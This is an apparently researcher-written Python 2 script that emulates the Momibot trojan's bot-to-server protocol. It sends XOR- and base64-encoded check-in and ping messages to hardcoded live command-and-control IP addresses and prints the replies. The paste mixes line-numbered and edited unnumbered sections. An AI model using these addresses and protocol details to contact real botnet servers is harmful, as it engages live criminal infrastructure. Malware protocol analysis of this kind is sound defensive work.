
MomiComm.py

dah4cker Aug 10th, 2011 148 Never
  1. #!/usr/bin/python
  2. # DaH4cKeR : 09-Aug-2011
  3. # Script : MomiComm.py
  4. # http://hypersecurity.blogspot.com
  5. #
  6. # Script to communicate with Win32/Momibot Trojan. It will send &
  7. # receive commands from the C&C server and display all responses (XML)
  8. # in clear text.
  9. #
  10. # http://www.microsoft.com/security/portal/Entry.aspx?name=Backdoor:Win32/Momibot.gen!B
  11. #
  12. # Cheers,
  13. # @DaH4cker
  14. #
  15. #######################################################################################
  16.  
#CnC="212.124.123.98:80"        #Sample MD5: 108da66dfa28a790a08be1965a2df8c2
#CnC="184.105.178.85:80"        #Sample MD5: 2a593a1ead30ee30017d71bd18d9e66b
CnC="203.146.253.110:8090"      #Sample MD5: 598417359361205d9c2a1892e3a31c13
# host:port string handed straight to httplib.HTTPConnection in send_receive();
# each address above was taken from the sample whose MD5 is noted beside it.

# All the samples I analyzed so far seem to be using the following XOR key
# and PHP pages for communication.

cntrl_page="/v4/index.php"
#cntrl_page="/v5/index.php"
XOR_key="\x53"
# Detection note: the POST to this path plus the fixed single-byte XOR (0x53)
# under base64 are the on-the-wire characteristics this script reproduces, and
# therefore the network indicators for this family.
  27.  
  28. ################### Modify beyond this at your own risk ! #####################
  29.  
  30.  
  31. import base64
  32. import httplib
  33.  
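def encrypt(msg, key):
    """XOR every byte of *msg* with the one-byte *key*, then base64-encode it.

    This is the bot's outbound message encoding as observed in the samples
    listed above: a fixed single-byte XOR followed by standard base64.

    Args:
        msg: the plaintext (XML) message as a text string.
        key: a one-character string; its ordinal is the XOR byte.

    Returns:
        The base64 text (``str`` on Python 2, ``bytes`` on Python 3).

    Raises:
        TypeError: if *key* is not exactly one character.
    """
    xor_byte = ord(key)  # constant for the whole message; hoisted out of the loop
    # bytearray does the XOR on integers under both Python 2 and 3 and avoids
    # the quadratic ``str += str`` accumulation of the original loop.
    buf = bytearray(ord(char) ^ xor_byte for char in msg)
    return base64.b64encode(bytes(buf))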
  41.  
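def decrypt(msg, key):
    """Reverse :func:`encrypt`: base64-decode *msg*, then XOR each byte with *key*.

    Args:
        msg: base64 text as received from the C&C (``str`` or ``bytes``).
        key: a one-character string; its ordinal is the XOR byte.

    Returns:
        The decoded text, or the literal sentinel ``"Invalid or Unknown Response"``
        when *msg* is not valid base64 (kept so the caller can still print
        whatever the server sent back instead of crashing).

    Raises:
        TypeError: if *key* is not exactly one character.
    """
    xor_byte = ord(key)
    try:
        raw = base64.b64decode(msg)
    except (TypeError, ValueError):
        # Python 2 raises TypeError on bad padding; Python 3 raises
        # binascii.Error, which is a ValueError. Nothing else is swallowed.
        return "Invalid or Unknown Response"
    # bytearray yields ints on both major versions, so no ord() on decoded data.
    return ''.join(chr(byte ^ xor_byte) for byte in bytearray(raw))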
  52.  
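def send_receive(params):
    """POST one encoded message to the configured C&C page and return the decoded reply.

    Uses the module-level ``CnC`` (host:port), ``cntrl_page`` (URL path) and
    ``XOR_key`` (decoding key) settings, and the ``decrypt`` helper.

    Args:
        params: the already-encoded request body (output of ``encrypt``).

    Returns:
        The decoded response text on HTTP 200; ``"<status> <reason>"`` for any
        other status; or ``"Timed Out - <error>"`` if the connection, request,
        response or body read raised. Errors are reported, never raised, so a
        dead or unreachable server does not abort the run.
    """
    conn = None
    try:
        conn = httplib.HTTPConnection(CnC)
        headers = {"Content-Type": "text/xml"}
        conn.request("POST", cntrl_page, params, headers)
        resp = conn.getresponse()
        if resp.status == 200:
            return decrypt(resp.read(), XOR_key)
        return str(resp.status) + " " + resp.reason
    except Exception as err:
        # Same sentinel text as before; "Timed Out" covers any socket/HTTP error.
        return "Timed Out - " + str(err)
    finally:
        # The original only closed on the success path, leaking the socket when
        # request()/getresponse() raised after the connection was opened.
        if conn is not None:
            conn.close()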
  67.  
if __name__ == "__main__":
        # Bot check-in ("binfo") message: the fields sent are an id, nt, the
        # bot version (bv), link type (lt) and OS string; the values below are
        # fixed test values, not taken from a live infection.
        hello_msg = "<root><binfo id=\'3559939039\' nt=\'1\' bv=\'4.6\' lt=\'LAN\' os=\'Windows XP Professional\'> </binfo></root>"
        # Keep-alive ("ping") message carrying the same id.
        ping_msg = "<root><ping id=\'3559939039\'/></root>"

        # Each message is XOR-ed with XOR_key and base64-encoded (encrypt), POSTed
        # to the C&C (send_receive), and the decoded reply is printed as-is.
        test1 = encrypt(hello_msg, XOR_key)
        print "Sending hello packet.."
        print "Response: "+send_receive(test1)

        test2 = encrypt(ping_msg, XOR_key)
        print "Sending ping packet.."
        print "Response: "+send_receive(test2)